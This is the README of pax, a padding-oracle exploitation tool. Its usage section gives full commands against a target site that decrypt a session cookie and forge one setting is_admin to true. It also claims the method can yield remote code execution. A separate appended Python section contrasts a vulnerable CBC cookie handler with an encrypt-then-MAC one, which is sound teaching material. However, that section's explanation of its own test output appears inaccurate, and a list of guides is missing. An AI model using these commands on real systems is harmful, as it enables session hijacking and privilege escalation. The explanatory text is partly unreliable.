Exploit padding oracles for fun and profit!
Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:
- Obtain plaintext for a given piece of CBC encrypted data.
- Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.
This can be used to disclose encrypted session information, and often to bypass authentication, escalate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.
As always, this tool should only be used on systems you own and/or have permission to probe!
Installation
Download from releases, or install with Go:
go get -u github.com/liamg/pax/cmd/pax
Example Usage
If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"
This will hopefully give you some plaintext, perhaps something like:
{"user_id": 456, "is_admin": false}
It looks like you could elevate your privileges here!
You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'
This will spit out another base64 encoded set of encrypted data, perhaps something like:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you're elevated to admin level.
How does this work?
The following are great guides on how this attack works:
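To show what makes the decrypt step above possible and what closes it off, here is an added Python example (not part of pax or its README): a CBC session-cookie handler that reports padding failures separately, beside an encrypt-then-MAC handler that returns a single error, plus a regression check that counts distinct responses to a tampered token. The Feistel block cipher, the keys, the token layouts and the server functions are constructed stand-ins, not anything from the pax project.

```python
import hmac, hashlib, json

BLOCK = 16
class PaddingError(Exception): pass
def _xor(a, b): return bytes(x ^ y for x, y in zip(a, b))

def block_cipher(key, blk, decrypt=False):
    # Toy 4-round Feistel cipher standing in for AES; the oracle does not depend on the cipher
    f = lambda i, h: hmac.new(key + bytes([i]), h, hashlib.sha256).digest()[:8]
    l, r = blk[:8], blk[8:]
    for i in (range(3, -1, -1) if decrypt else range(4)):
        l, r = (_xor(r, f(i, l)), l) if decrypt else (r, _xor(l, f(i, r)))
    return l + r

def cbc_encrypt(key, iv, pt):
    n = BLOCK - len(pt) % BLOCK                      # PKCS#7 padding, 1..16 bytes
    pt, out, prev = pt + bytes([n]) * n, b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_cipher(key, _xor(pt[i:i + BLOCK], prev)); out += prev
    return out

def cbc_decrypt(key, iv, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pt = b"".join(_xor(block_cipher(key, c, True), p) for c, p in zip(blocks, [iv] + blocks))
    n = pt[-1]
    if not 1 <= n <= BLOCK or pt[-n:] != bytes([n]) * n:
        raise PaddingError                           # the distinguishable failure pax relies on
    return pt[:-n]

def vulnerable_server(key, token):
    # Unauthenticated CBC, token = iv || ct: padding and parse failures get different messages
    try: json.loads(cbc_decrypt(key, token[:BLOCK], token[BLOCK:])); return "ok"
    except PaddingError: return "padding error"
    except Exception: return "invalid session"

def seal(key, mac_key, iv, pt):  # encrypt-then-MAC token for hardened_server: tag || iv || ct
    body = iv + cbc_encrypt(key, iv, pt)
    return hmac.new(mac_key, body, hashlib.sha256).digest() + body

def hardened_server(key, mac_key, token):
    # Verify the tag over iv || ct in constant time before touching the ciphertext; one error only
    tag, body = token[:32], token[32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, body, hashlib.sha256).digest()): return "invalid session"
    try: json.loads(cbc_decrypt(key, body[:BLOCK], body[BLOCK:])); return "ok"
    except Exception: return "invalid session"

def distinct_responses(server, token):
    # Regression check: vary the byte driving the last plaintext byte; an oracle yields >1 response
    idx = len(token) - BLOCK - 1
    return len({server(token[:idx] + bytes([v]) + token[idx + 1:]) for v in range(256) if v != token[idx]})
```

Run `distinct_responses(lambda t: vulnerable_server(key, t), iv + cbc_encrypt(key, iv, pt))` on the sample session JSON from above: it reports 2 (a padding error and a successful parse), while the same check against `hardened_server` on a token from `seal` reports 1. The check takes a single-argument callable, so bind the keys with a lambda as shown.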